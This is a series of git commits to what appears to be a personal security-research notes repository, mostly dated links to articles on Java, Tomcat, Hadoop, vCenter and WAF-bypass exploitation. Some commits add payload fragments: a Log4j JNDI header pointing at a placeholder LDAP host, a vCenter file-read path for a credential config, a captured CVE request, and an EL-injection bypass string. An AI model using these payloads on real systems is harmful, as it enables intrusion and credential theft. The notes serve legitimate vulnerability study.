+ 2022/10/15 [bcel环境下打入springboot内存马](https://mp.weixin.qq.com/s?__biz=MzU5MTExMjYwMA==&mid=2247485492&idx=1&sn=82fd393c7fc33417bff5d8cfa81b1451&chksm=fe32b8c3c94531d520d3fe4b0349b982fab83da2f6273799b68aa48f7bbb16700a642034c15e&mpshare=1&scene=23&srcid=1014Db7SCSD03rrslhpasxqf&sharer_sharetime=1665743334925&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **解决方法太麻烦,可以直接写一个loader里面加载代码。就不需要通过bcel加载了。(因为使用bcel加载的时候会存在class not find,因为加载器是bcel.)**
+ 2022/10/15 [Padding Oracle原理深度解析&CBC字节翻转攻击原理解析](https://mp.weixin.qq.com/s/OtGw-rALwpBkERfvqdZ4kQ?utm_source=qq&utm_medium=social&utm_oi=1165421494795706368)
+ 2022/10/16 [Shiro Padding Oracle攻击分析](https://www.cnblogs.com/wh4am1/p/12761959.html) **重新学习**
++ 2022/10/16 [JSP文件无依赖加载shellcode分析](https://cangqingzhe.github.io/2021/10/21/JSP%E6%96%87%E4%BB%B6%E6%97%A0%E4%BE%9D%E8%B5%96%E5%8A%A0%E8%BD%BDshellcode%E5%88%86%E6%9E%90/) **由于这种方式是通过Tomcat服务的进程上线的,exit的话比较困难**
From 20024f762022224471ecffd354624da5a4388f78 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Mon, 17 Oct 2022 11:16:23 +0800
Subject: [PATCH 078/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 39d0e80..074b9c9 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -180,3 +180,4 @@
+ 2022/10/15 [Padding Oracle原理深度解析&CBC字节翻转攻击原理解析](https://mp.weixin.qq.com/s/OtGw-rALwpBkERfvqdZ4kQ?utm_source=qq&utm_medium=social&utm_oi=1165421494795706368)
+ 2022/10/16 [Shiro Padding Oracle攻击分析](https://www.cnblogs.com/wh4am1/p/12761959.html) **重新学习**
+ 2022/10/16 [JSP文件无依赖加载shellcode分析](https://cangqingzhe.github.io/2021/10/21/JSP%E6%96%87%E4%BB%B6%E6%97%A0%E4%BE%9D%E8%B5%96%E5%8A%A0%E8%BD%BDshellcode%E5%88%86%E6%9E%90/) **由于这种方式是通过Tomcat服务的进程上线的,exit的话比较困难**
++ 2022/10/17 [负载均衡踩坑记](https://cangqingzhe.github.io/2021/09/24/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1%E8%B8%A9%E5%9D%91%E8%AE%B0/)
From 2abd8cb5c6a37f7c80f5dad4e7ab771793ae6074 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Mon, 17 Oct 2022 12:31:25 +0800
Subject: [PATCH 079/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 074b9c9..21508c7 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -181,3 +181,4 @@
+ 2022/10/16 [Shiro Padding Oracle攻击分析](https://www.cnblogs.com/wh4am1/p/12761959.html) **重新学习**
+ 2022/10/16 [JSP文件无依赖加载shellcode分析](https://cangqingzhe.github.io/2021/10/21/JSP%E6%96%87%E4%BB%B6%E6%97%A0%E4%BE%9D%E8%B5%96%E5%8A%A0%E8%BD%BDshellcode%E5%88%86%E6%9E%90/) **由于这种方式是通过Tomcat服务的进程上线的,exit的话比较困难**
+ 2022/10/17 [负载均衡踩坑记](https://cangqingzhe.github.io/2021/09/24/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1%E8%B8%A9%E5%9D%91%E8%AE%B0/)
++ 2022/10/17 [最新CS RCE(CVE-2022-39197)复现心得分享](https://mp.weixin.qq.com/s/89wXyPaSn3TYn4pmVdr-Mw)
From b483a9f6d46bdb6f357d7f9cf9b1020650a2e69a Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Mon, 17 Oct 2022 22:56:42 +0800
Subject: [PATCH 080/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 21508c7..c4dd358 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -182,3 +182,4 @@
+ 2022/10/16 [JSP文件无依赖加载shellcode分析](https://cangqingzhe.github.io/2021/10/21/JSP%E6%96%87%E4%BB%B6%E6%97%A0%E4%BE%9D%E8%B5%96%E5%8A%A0%E8%BD%BDshellcode%E5%88%86%E6%9E%90/) **由于这种方式是通过Tomcat服务的进程上线的,exit的话比较困难**
+ 2022/10/17 [负载均衡踩坑记](https://cangqingzhe.github.io/2021/09/24/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1%E8%B8%A9%E5%9D%91%E8%AE%B0/)
+ 2022/10/17 [最新CS RCE(CVE-2022-39197)复现心得分享](https://mp.weixin.qq.com/s/89wXyPaSn3TYn4pmVdr-Mw)
++ 2022/10/17 [RMI攻击Registry的两种方式](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651199558&idx=2&sn=f92be210fda6dcda351912e5819191e5&chksm=bd1d8acd8a6a03db3b62ba72b2a3b931ab99cf74dbacde501c0d615a8eb894c50d96405b3b43&mpshare=1&scene=23&srcid=10175X0cCc5JMI6fbq1VPYi6&sharer_sharetime=1666017207856&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
From dbcc50a340f6532597a77a1ceb166baf99483320 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Wed, 19 Oct 2022 00:01:36 +0800
Subject: [PATCH 081/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index c4dd358..26584c0 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -183,3 +183,4 @@
+ 2022/10/17 [负载均衡踩坑记](https://cangqingzhe.github.io/2021/09/24/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1%E8%B8%A9%E5%9D%91%E8%AE%B0/)
+ 2022/10/17 [最新CS RCE(CVE-2022-39197)复现心得分享](https://mp.weixin.qq.com/s/89wXyPaSn3TYn4pmVdr-Mw)
+ 2022/10/17 [RMI攻击Registry的两种方式](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651199558&idx=2&sn=f92be210fda6dcda351912e5819191e5&chksm=bd1d8acd8a6a03db3b62ba72b2a3b931ab99cf74dbacde501c0d615a8eb894c50d96405b3b43&mpshare=1&scene=23&srcid=10175X0cCc5JMI6fbq1VPYi6&sharer_sharetime=1666017207856&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
++ 2022/10/19 [Apache Spark UI 命令注入漏洞 CVE-2022-33891](https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MjM5MTYxNjQxOA==&action=getalbum&album_id=2619537533131227139&scene=173&from_msgid=2652892336&from_itemidx=1&count=3&nolastread=1#wechat_redirect)
From 614fade87eda619c49519b38ca8a18ef3fc09fc7 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Wed, 19 Oct 2022 08:37:53 +0800
Subject: [PATCH 082/257] Update README.md
---
tomcat/README.md | 3 +++
1 file changed, 3 insertions(+)
diff --git a/tomcat/README.md b/tomcat/README.md
index 1747bb3..c38371f 100644
--- a/tomcat/README.md
+++ b/tomcat/README.md
@@ -3,3 +3,6 @@
Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可,成为目前比较流行的Web 应用服务器Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好Apache 服务器,可利用它响应HTML(标准通用标记语言下的一个应用)页面的访问请求。实际上Tomcat是Apache 服务器的扩展,但运行时它是独立运行的,所以当你运行tomcat 时,它实际上作为一个与Apache 独立的进程单独运行的
+
+
+[复现tomcat远程代码执行漏洞CVE-2016-8735](https://gv7.me/articles/2018/CVE-2016-8735/)
From 65e60bdac9b270aec98bf27d298747e5368350cc Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Thu, 20 Oct 2022 23:23:11 +0800
Subject: [PATCH 083/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 26584c0..514c97a 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -184,3 +184,4 @@
+ 2022/10/17 [最新CS RCE(CVE-2022-39197)复现心得分享](https://mp.weixin.qq.com/s/89wXyPaSn3TYn4pmVdr-Mw)
+ 2022/10/17 [RMI攻击Registry的两种方式](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651199558&idx=2&sn=f92be210fda6dcda351912e5819191e5&chksm=bd1d8acd8a6a03db3b62ba72b2a3b931ab99cf74dbacde501c0d615a8eb894c50d96405b3b43&mpshare=1&scene=23&srcid=10175X0cCc5JMI6fbq1VPYi6&sharer_sharetime=1666017207856&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
+ 2022/10/19 [Apache Spark UI 命令注入漏洞 CVE-2022-33891](https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MjM5MTYxNjQxOA==&action=getalbum&album_id=2619537533131227139&scene=173&from_msgid=2652892336&from_itemidx=1&count=3&nolastread=1#wechat_redirect)
++ 2022/10/20 [如何更加精确的检测Tomcat AJP文件包含漏洞(CVE-2020-1938)](https://gv7.me/articles/2020/how-to-detect-tomcat-ajp-lfi-more-accurately/) **ajp的利用**
From 5dfacecf58e66efb2be368053025c1f04571aad4 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 22 Oct 2022 00:22:39 +0800
Subject: [PATCH 084/257] Update Readme.md
---
"java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md"
index 0bc0205..7944b15 100644
--- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md"
+++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md"
@@ -26,3 +26,4 @@ https://www.sec-in.com/author/8 这个师傅太猛了
+ 2022/01/31 [验证是否存在写文件漏洞小技巧](https://mp.weixin.qq.com/s?__biz=MzkyMDIxMjE5MA==&mid=2247483994&idx=1&sn=2d29f31afa27a3709b5dc9e46532230a&chksm=c19705ebf6e08cfdd6dc59937beee4a77110b3cac9958335a6cfdbd020d00f2f24a7033063f2&mpshare=1&scene=23&srcid=0131EzMk9fpayyNZeXFR8nhb&sharer_sharetime=1643561054742&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd)
+ 2022/02/26 [记一次曲折的weblogic上传webshell](https://chaserw.github.io/2021/11/05/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9B%B2%E6%8A%98%E7%9A%84weblogic%E4%B8%8A%E4%BC%A0webshell/)
+ 2022/10/08 [实战 | 一次成功的子域名劫持](https://mp.weixin.qq.com/s/xA6OVbeQrCgeYBWMtkvWVA) **学习**
++ 2022/10/22 [上传包可“绕过”Java过滤器的检查?](https://gv7.me/articles/2019/why-can-multipart-post-bypass-java-filter/) **遇到了post请求有waf可以试一试文件上传的方法传递参数**
From 3f0005fc0f5ab54ba4ea243fef3d9bf10b003b37 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 22 Oct 2022 00:23:46 +0800
Subject: [PATCH 085/257] Update Readme.md
---
"java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md"
index 7944b15..63f06c2 100644
--- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md"
+++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md"
@@ -27,3 +27,4 @@ https://www.sec-in.com/author/8 这个师傅太猛了
+ 2022/02/26 [记一次曲折的weblogic上传webshell](https://chaserw.github.io/2021/11/05/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9B%B2%E6%8A%98%E7%9A%84weblogic%E4%B8%8A%E4%BC%A0webshell/)
+ 2022/10/08 [实战 | 一次成功的子域名劫持](https://mp.weixin.qq.com/s/xA6OVbeQrCgeYBWMtkvWVA) **学习**
+ 2022/10/22 [上传包可“绕过”Java过滤器的检查?](https://gv7.me/articles/2019/why-can-multipart-post-bypass-java-filter/) **遇到了post请求有waf可以试一试文件上传的方法传递参数**
++ 2022/10/22 [burpsuite保存现有数据包记录&导入之前的抓包记录](https://blog.csdn.net/Fly_hps/article/details/88854111) [148处XSS你如何提交给开发修复?](https://gv7.me/articles/2017/how-do-to-submit-148-xss-vulnerabilities/) **bp的保存数据**
From 1a286e4e90f9fe6176a7431c5c88fe7f4836b434 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 22 Oct 2022 16:02:35 +0800
Subject: [PATCH 086/257] Add files via upload
---
.../chunked-coding-converter.md" | 20 +++++++++++++++++++
1 file changed, 20 insertions(+)
create mode 100644 "java\346\227\245\345\270\270/chunked-coding-converter.md"
diff --git "a/java\346\227\245\345\270\270/chunked-coding-converter.md" "b/java\346\227\245\345\270\270/chunked-coding-converter.md"
new file mode 100644
index 0000000..4cd529f
--- /dev/null
+++ "b/java\346\227\245\345\270\270/chunked-coding-converter.md"
@@ -0,0 +1,20 @@
+# chunked-coding-converter
+
+[唯快不破的分块传输绕WAF](https://mp.weixin.qq.com/s/pM1ULCqNdQwSB7hcltrbtw)
+
+[Bypass WAF HTTP协议覆盖+分块传输组合绕过](https://mp.weixin.qq.com/s/2DDYyvsZ5HIQC0qGMK9znQ)
+
+[利用分块传输吊打所有WAF](https://mp.weixin.qq.com/s/eDiiiVX4oF0LYG3Ia5P4mw)
+
+[技术讨论 | 在HTTP协议层面绕过WAF](https://www.freebuf.com/news/193659.html)
+
+[编写Burp分块传输插件绕WAF](https://gv7.me/articles/2019/chunked-coding-converter/)
+
+[Java反序列化数据绕WAF之延时分块传输](https://gv7.me/articles/2021/java-deserialized-data-bypasses-waf-through-sleep-chunked/)
+
+```
+只有HTTP/1.1支持分块传输
+POST包都支持分块,不局限仅仅于反序列化和上传包
+Transfer-Encoding: chunked大小写不敏感
+```
+
From ecc2b96cb605d519cbccd1e98b501572154224bb Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Mon, 24 Oct 2022 11:35:43 +0800
Subject: [PATCH 087/257] Create Readme.md
---
hadoop/Readme.md | 21 +++++++++++++++++++++
1 file changed, 21 insertions(+)
create mode 100644 hadoop/Readme.md
diff --git a/hadoop/Readme.md b/hadoop/Readme.md
new file mode 100644
index 0000000..7e168b6
--- /dev/null
+++ b/hadoop/Readme.md
@@ -0,0 +1,21 @@
+# Hadoop
+
+[【安全风险通告】Apache Hadoop Yarn RPC未授权访问漏洞安全风险通告](https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247495027&idx=1&sn=5758a6717309a55e09f184e5bae82c75&chksm=fe79c9ebc90e40fd6d0c3f0bd21ce92f53b4f58aa0ee07d0c005ca85a28d2cfd70f61c40fae7&mpshare=1&scene=23&srcid=1123jW67UF5RY5e5aOeDZ5ha&sharer_sharetime=1637638003307&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd)
+
+[Hadoop Yarn RPC RCE 复现](https://mp.weixin.qq.com/s/lVl5HnVuZyLTIeSrbw1cuA)
+
+[Hadoop Yarn RPC未授权RCE(含一键利用工具)](https://mp.weixin.qq.com/s?__biz=MzkwNDI1NDUwMQ==&mid=2247485150&idx=1&sn=c31937fdb3e92ae3951a98b7967032b2&chksm=c0888394f7ff0a8224a8984f2cb4935f9aa1e7d243c4b512c488600d8fef0b6ec16a2b345865&token=616099468&lang=zh_CN#rd)
+
+[Hadoop Yarn RPC未授权访问漏洞复现](https://zgao.top/hadoop-yarn-rpc%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/)
+
+[GHSL-2022-012: Arbitrary file write during TAR extraction in Apache Hadoop - CVE-2022-26612](https://securitylab.github.com/advisories/GHSL-2022-012_Apache_Hadoop/)
+
+## 环境搭建
+
+org.apache.hadoop.yarn.util.resource.ResourceUtils
+
+```
+docker pull kpli0rn/hadoop-rpc-vuln:3.3.0
+docker run -d --name yarn -p 8042:8042 -p 8032:8032 kpli0rn/hadoop-rpc-vuln:3.3.0
+```
+
From 537940ec5569abeb556ed3e1d398602f5f513971 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Mon, 24 Oct 2022 15:36:02 +0800
Subject: [PATCH 088/257] Create Readme.md
---
VMware vCenter/Readme.md | 92 ++++++++++++++++++++++++++++++++++++++++
1 file changed, 92 insertions(+)
create mode 100644 VMware vCenter/Readme.md
diff --git a/VMware vCenter/Readme.md b/VMware vCenter/Readme.md
new file mode 100644
index 0000000..f8ff54d
--- /dev/null
+++ b/VMware vCenter/Readme.md
@@ -0,0 +1,92 @@
+# vcenter
+
+### 版本查看
+
+```
+/sdk/vimServiceVersions.xml
+```
+
+### CVE-2021-21972
+
+[VMware vCenter RCE 漏洞踩坑实录——一个简单的RCE漏洞到底能挖出什么知识](https://mp.weixin.qq.com/s/eamNsLY0uKHXtUw_fiUYxQ)
+
+[CVE-2021-21972 vCenter Server 文件写入漏洞分析](https://blog.noah.360.net/vcenter-6-5-7-0-rce-lou-dong-fen-xi/)
+
+```
+VMware vCenter Server 7.0系列 < 7.0.U1c
+VMware vCenter Server 6.7系列 < 6.7.U3l
+VMware vCenter Server 6.5系列 < 6.5 U3n
+VMware ESXi 7.0系列 < ESXi70U1c-17325551
+VMware ESXi 6.7系列 < ESXi670-202102401-SG
+VMware ESXi 6.5系列 < ESXi650-202102101-SG
+```
+
+endpoint
+
+```
+/ui/vropspluginui/rest/services/uploadova
+```
+
+### CVE-2021-21985
+
+[CVE-2021-21985 VMware vCenter Server远程代码执行漏洞分析](https://www.ghtwf01.cn/2022/07/31/CVE-2021-21985%20VMware%20vCenter%20Server%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/)
+
+```
+VMware vCenter Server 7.0系列 < 7.0.U2b
+VMware vCenter Server 6.7系列 < 6.7.U3n
+VMware vCenter Server 6.5系列 < 6.5 U3p
+VMware Cloud Foundation 4.x 系列 < 4.2.1
+VMware Cloud Foundation 4.x 系列 < 3.10.2.1
+```
+
+### CVE-2021-22005
+
+[vCenter RCE 详细分析过程 (CVE-2021–22005)](https://cloud.tencent.com/developer/article/1887641)
+
+```
+VMware vCenter Server 7.0
+VMware vCenter Server 6.7 Running On Virtual Appliance
+VMware Cloud Foundation (vCenter Server) 4.x
+VMware Cloud Foundation (vCenter Server) 3.x
+```
+
+### Log4j
+
+endpoint
+
+```
+/websso/SAML2/SSO/vsphere.local?SAMLRequest=
+
+X-Forwarded-For: ${jndi:ldap://exp}
+```
+
+
+
+### CVE-2022-31680
+
+[CVE-2022-31680](https://talosintelligence.com/vulnerability_reports/TALOS-2022-1587)
+
+```
+GET /psc/data/constraint/amJzMXszAAAAATMAAAACAAAIRW1wbG95ZWUAASL6C7Hsp5eXAAKXEjO-44rgaCk1FZKH_mF7AQQAAAADAAAGTWFyY2luAAB6aQ HTTP/1.1
+Host: 192.168.0.109
+Cookie: JSESSIONID=D8E403940B6B595FF53158ED63671A69; XSRF-TOKEN=b28efbac-6d3c-4fcb-b177-baee9c1e005e; VSPHERE-USERNAME=Administrator%40VSPHERE.LOCAL; VSPHERE-CLIENT-SESSION-INDEX=_87577cc1f7ac5bba20fe8d947d9ffcfe
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
+Accept: application/json, text/plain, */*
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Pragma: no-cache
+Isangularrequest: true
+X-Xsrf-Token: b28efbac-6d3c-4fcb-b177-baee9c1e005e
+Referer: https://192.168.0.109/psc/
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+Connection: close
+```
+
+### 后续利用
+
+[VMware vCenter漏洞实战利用总结](https://mp.weixin.qq.com/s/0gg5TDEtL3lCb9pOnm42gg)
+
+[Vcenter实战利用方式总结](https://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247499057&idx=1&sn=24ce83c75152529f2b8ef8543162a734&chksm=cfa55922f8d2d0349b97211fdf45df6c78b26ace580b68579817ed67760aaface17348529cf3&mpshare=1&scene=23&srcid=10245pAGxEFHmXFGCMoKjGdB&sharer_sharetime=1666572610152&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
From 38258217a9f8a82cb920cd2651f1555c15e71add Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Mon, 24 Oct 2022 17:03:42 +0800
Subject: [PATCH 089/257] Update Readme.md
---
VMware vCenter/Readme.md | 9 +++++++++
1 file changed, 9 insertions(+)
diff --git a/VMware vCenter/Readme.md b/VMware vCenter/Readme.md
index f8ff54d..a4ff167 100644
--- a/VMware vCenter/Readme.md
+++ b/VMware vCenter/Readme.md
@@ -6,6 +6,15 @@
/sdk/vimServiceVersions.xml
```
+### VMware vCenter Server 任意文件读取漏洞
+
+[VMware vCenter Server 任意文件读取漏洞](https://forum.90sec.com/t/topic/1582)
+
+endpoint
+```
+/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
+```
+
### CVE-2021-21972
[VMware vCenter RCE 漏洞踩坑实录——一个简单的RCE漏洞到底能挖出什么知识](https://mp.weixin.qq.com/s/eamNsLY0uKHXtUw_fiUYxQ)
From 5ea6357b701e922c155ffb8ade88fcfe2e395876 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Tue, 25 Oct 2022 09:35:12 +0800
Subject: [PATCH 090/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 514c97a..1549567 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -185,3 +185,4 @@
+ 2022/10/17 [RMI攻击Registry的两种方式](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651199558&idx=2&sn=f92be210fda6dcda351912e5819191e5&chksm=bd1d8acd8a6a03db3b62ba72b2a3b931ab99cf74dbacde501c0d615a8eb894c50d96405b3b43&mpshare=1&scene=23&srcid=10175X0cCc5JMI6fbq1VPYi6&sharer_sharetime=1666017207856&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd)
+ 2022/10/19 [Apache Spark UI 命令注入漏洞 CVE-2022-33891](https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MjM5MTYxNjQxOA==&action=getalbum&album_id=2619537533131227139&scene=173&from_msgid=2652892336&from_itemidx=1&count=3&nolastread=1#wechat_redirect)
+ 2022/10/20 [如何更加精确的检测Tomcat AJP文件包含漏洞(CVE-2020-1938)](https://gv7.me/articles/2020/how-to-detect-tomcat-ajp-lfi-more-accurately/) **ajp的利用**
++ 2022/10/25 [Python PIP自解压的命令执行](https://mp.weixin.qq.com/s/xFY6VYzrA4RryH1agC8zUw) **包管理工具的命令执行** [node npm 中的preinstall 命令执行](https://bytedance.feishu.cn/docx/doxcnWmtkIItrGokckfo1puBtCh)
From d39959ef08ef3f46dda521dad048bf4e5909dc5a Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Tue, 25 Oct 2022 20:46:21 +0800
Subject: [PATCH 091/257] Update README.md
---
Solr/README.md | 3 +++
1 file changed, 3 insertions(+)
diff --git a/Solr/README.md b/Solr/README.md
index 38c86b8..cc7d06c 100644
--- a/Solr/README.md
+++ b/Solr/README.md
@@ -186,3 +186,6 @@ get = requests.get(burp0_url, headers=burp0_headers)
print(get.text)
```
+## 任意文件删除
+
+https://mp.weixin.qq.com/s/JXBiQR3q7ykITVFBwm_9Vg
From 8b8e829bf050464a8b36ddf26841bed72dbb84aa Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Wed, 26 Oct 2022 11:39:18 +0800
Subject: [PATCH 092/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 1549567..ff2b853 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -186,3 +186,4 @@
+ 2022/10/19 [Apache Spark UI 命令注入漏洞 CVE-2022-33891](https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MjM5MTYxNjQxOA==&action=getalbum&album_id=2619537533131227139&scene=173&from_msgid=2652892336&from_itemidx=1&count=3&nolastread=1#wechat_redirect)
+ 2022/10/20 [如何更加精确的检测Tomcat AJP文件包含漏洞(CVE-2020-1938)](https://gv7.me/articles/2020/how-to-detect-tomcat-ajp-lfi-more-accurately/) **ajp的利用**
+ 2022/10/25 [Python PIP自解压的命令执行](https://mp.weixin.qq.com/s/xFY6VYzrA4RryH1agC8zUw) **包管理工具的命令执行** [node npm 中的preinstall 命令执行](https://bytedance.feishu.cn/docx/doxcnWmtkIItrGokckfo1puBtCh)
++ 2022/10/26 [这是我见过最复杂的URL了](https://cn-sec.com/archives/1372213.html)
From 730d0c4ceadeb1cc92845254303c16c3dba8c317 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Wed, 26 Oct 2022 21:44:06 +0800
Subject: [PATCH 093/257] Create Readme.md
---
apache storm/Readme.md | 21 +++++++++++++++++++++
1 file changed, 21 insertions(+)
create mode 100644 apache storm/Readme.md
diff --git a/apache storm/Readme.md b/apache storm/Readme.md
new file mode 100644
index 0000000..c269064
--- /dev/null
+++ b/apache storm/Readme.md
@@ -0,0 +1,21 @@
+# apache storm
+
+## 环境搭建
+
+https://blog.51cto.com/u_13870740/3445168
+
+https://github.com/heibaiying/BigData-Notes/blob/master/notes/installation/Storm%E5%8D%95%E6%9C%BA%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA.md
+
+```
+nohup bash storm dev-zookeeper & bash storm nimbus & bash storm supervisor &bash storm ui & bash storm logviewer &
+```
+
+## 漏洞分析
+
+https://paper.seebug.org/1780/#0x03
+
+https://blog.noah.360.net/apache-storm-vulnerability-analysis/
+
+https://y4er.com/posts/apache-storm-two-cve/
+
+**自己尝试反序列化并没有成功cb,环境是2.1.0**
From 5bad93020461157ec8398cbcac82898febf3378d Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Thu, 27 Oct 2022 14:19:26 +0800
Subject: [PATCH 094/257] Update Readme.md
---
shell/EL/Readme.md | 6 ++++++
1 file changed, 6 insertions(+)
diff --git a/shell/EL/Readme.md b/shell/EL/Readme.md
index 56f6390..66df221 100644
--- a/shell/EL/Readme.md
+++ b/shell/EL/Readme.md
@@ -39,3 +39,9 @@ ${''.class.forName('com.sun.org.apache.bcel.internal.util.ClassLoader').newInsta
```
**需要注意jdk版本问题可能没有bcel类**
理论上spel表达式可以用的payLoad 这里也可以利用
+## bypass
+
+https://forum.butian.net/share/1880
+```java
+${""[param.a]()[param.b](param.c)[param.d]()[param.e](param.f)[param.g](param.h)}
+```
From 9c0a916079cd1fcde6fd6b7ebfa50ff2ecd4d209 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
